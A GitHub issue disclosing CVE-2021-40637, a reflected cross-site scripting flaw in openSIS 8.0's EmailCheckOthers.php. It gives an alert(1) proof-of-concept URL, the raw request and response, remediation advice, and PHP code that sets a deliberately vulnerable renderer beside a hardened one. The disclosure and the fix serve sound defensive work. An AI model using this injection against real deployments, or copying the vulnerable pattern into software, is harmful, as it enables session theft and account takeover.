CVE-2021-40637: Reflected XSS in EmailCheckOthers.php · Issue #199 · OS4ED/openSIS-Classic
OS4ED openSIS 8.0 is affected by cross-site scripting (XSS) in EmailCheckOthers.php. An attacker can inject JavaScript code to obtain the user's cookie and take over the user's working session.
Description
By injecting JavaScript code, an attacker can steal the user's cookie and take over the user's account. This happens because no input validation or output encoding is applied to the reflected parameter (`opt` in the request below). This was tested on the demo website.
Exploitation
Injection point:

```
HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf
```
Request:

```http
GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1
```

Response:

```http
HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 09:57:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
```
Solution:
Before using any user input, verify and sanitize it properly; trust nothing sent from the client. For XSS specifically, consider using the htmlentities() function to encode user input before printing it to the user's screen.
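The following is an added example, not code from openSIS: a minimal model of the reflected-parameter pattern described above, beside a hardened version that validates `opt` against an allow-list and encodes it with htmlentities() on output. The allow-list values and the HTML wrapper are assumptions; the real script's valid options are not given in this issue.

```php
<?php
// Added example (not openSIS code). Assumption: the page reflects the `opt`
// query parameter into its HTML response, as the request in this issue suggests.

// VULNERABLE: the raw parameter is concatenated into HTML, so a value such as
// <script>alert(1)</script> is returned to the browser as live markup.
function render_vulnerable(array $query): string
{
    $opt = $query['opt'] ?? '';
    return '<div class="result">' . $opt . '</div>';
}

// Output-encoding helper. ENT_QUOTES encodes both ' and " so the result is
// also safe inside attribute values; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of silently returning an empty string.
function e(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HARDENED: validate first (hypothetical allow-list of option names and a
// syntactic e-mail check), then encode on output regardless of validation.
function render_hardened(array $query): string
{
    $allowedOptions = ['others', 'staff'];   // placeholder values, not the real ones
    $opt   = $query['opt'] ?? '';
    $email = $query['email'] ?? '';

    if (!in_array($opt, $allowedOptions, true)) {
        return '<div class="error">' . e('Invalid option') . '</div>';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return '<div class="error">' . e('Invalid e-mail address') . '</div>';
    }
    // Even validated values are encoded: defence in depth if the list changes later.
    return '<div class="result">' . e($opt) . ': ' . e($email) . '</div>';
}

// Constructed sample input mirroring the request in this issue.
$payload = ['opt' => '<script>alert(1)</script>', 'email' => 'asfasf'];

echo render_vulnerable($payload), PHP_EOL;   // markup is reflected unchanged
echo render_hardened($payload), PHP_EOL;     // rejected by the allow-list
echo render_hardened(['opt' => 'others', 'email' => 'user@example.org']), PHP_EOL;
```

Run with `php example.php` and compare the three lines: only the vulnerable renderer returns the `<script>` element intact.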